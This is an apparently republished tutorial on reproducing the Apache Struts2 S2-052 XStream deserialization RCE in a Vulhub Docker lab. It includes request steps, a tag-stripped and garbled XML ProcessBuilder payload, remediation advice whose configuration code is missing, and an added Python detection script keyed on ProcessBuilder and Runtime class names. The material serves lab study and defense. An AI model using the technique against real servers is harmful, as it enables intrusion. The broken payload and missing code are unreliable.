
How to reproduce the Apache Struts2 S2-052 remote code execution vulnerability

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article focuses on how to reproduce the Apache Struts2 S2-052 remote code execution vulnerability. The content is clear, organized and easy to follow, which makes it suitable for beginners. Interested readers can follow along with the editor. I hope everyone gets something out of this article!

0x00 Vulnerability Description

On September 5, 2017, Apache Struts released a security bulletin stating that the REST plugin for Apache Struts 2.5.x has a high-risk remote code execution vulnerability, numbered CVE-2017-9805 (S2-052). The vulnerability exists because XStreamHandler deserializes XML with XStream instances without any type filtering, which leads to remote code execution.

0x01 Affected Versions

Apache Struts 2.5 - Struts 2.5.12

Apache Struts 2.1.2 - Struts 2.3.33

0x02 Vulnerability Reproduction

Deploy Docker in a virtual machine and use Vulhub to build the vulnerability test environment with one command.

docker-compose up -d

1. Access the vulnerable environment

http://192.168.60.131:8080/orders.xhtml

2. Use the edit function to modify the data and submit it as a POST request

3. The REST plugin chooses the parser according to the URI extension or the Content-Type header. Change the xhtml extension, or change the Content-Type header to application/xml, to pass XML data in the body.

4. Capture the packet and modify the Content-Type

5. Construct the request with the XML-format payload

0false0touch/tmp/yunzui.txtfalsejava.lang.ProcessBuilderstartfoofoofalse00falsefalse0

6. Send the payload to exploit the vulnerability and execute the command. The response returns a 500 status code, but the command is executed successfully.

touch /tmp/yunzui.txt

7. Enter the Docker container to check the result of the command; it was executed successfully.

docker-compose exec struts2 bash

ls -al /tmp

0x03 Remediation

1. Upgrade to Apache Struts 2.5.13 or 2.3.34

2. If the system does not use the Struts REST plug-in, you can delete the plug-in directly, or add the following code to the configuration file to restrict the server-side extensions.

3. Restrict the server-side extension types and remove XML support
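
A defensive triage check for the handler selection described in step 3, added here as an example (not code from the original article or from Struts): it flags requests whose URI extension or Content-Type would route a body to XML parsing. The function names, the sample requests and the `java.lang.Runtime` marker are assumptions, and the selection rule is a simplified reading of the article's description, not the plugin's exact logic.

```python
import posixpath
import re
from urllib.parse import urlsplit

# java.lang.ProcessBuilder is the class named in this page's payload;
# java.lang.Runtime is an extra marker added here as an assumption.
MARKERS = re.compile(rb"java\.lang\.(ProcessBuilder|Runtime)")

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    target = lines[0].split(" ")[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return urlsplit(target).path, headers, body

def reaches_xml_handler(path: str, headers: dict) -> bool:
    """True if the URI extension or the Content-Type selects XML parsing."""
    ext = posixpath.splitext(path)[1].lower()
    media = headers.get("content-type", "").split(";")[0].strip().lower()
    return ext == ".xml" or media == "application/xml"

def triage(raw: bytes) -> str:
    """Return 'ok', 'review' (a body reaches XML parsing) or 'alert'."""
    path, headers, body = parse_request(raw)
    if not body.strip() or not reaches_xml_handler(path, headers):
        return "ok"
    return "alert" if MARKERS.search(body) else "review"

def req(target: bytes, ctype: bytes, body: bytes) -> bytes:
    """Build a constructed sample request (lab.example is a placeholder host)."""
    return (b"POST " + target + b" HTTP/1.1\r\nHost: lab.example\r\n"
            b"Content-Type: " + ctype + b"\r\n\r\n" + body)

SAMPLES = [  # constructed inputs, not captured traffic
    req(b"/orders/3", b"application/x-www-form-urlencoded", b"clientName=Bob"),
    req(b"/orders/3", b"application/xml; charset=UTF-8", b"<order/>"),
    req(b"/orders/3.xml", b"text/plain", b'<a class="java.lang.ProcessBuilder"/>'),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample))
```

After XML support has been removed as in item 3, any request this check still marks `review` or `alert` is worth investigating, because no legitimate client should be sending XML bodies to the REST endpoints.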

Thank you for reading. You should now have a certain understanding of how to reproduce the Apache Struts2 S2-052 remote code execution vulnerability, so go and practice it. If you want to learn more about related topics, you can follow the website. The editor will continue to bring better articles to everyone!
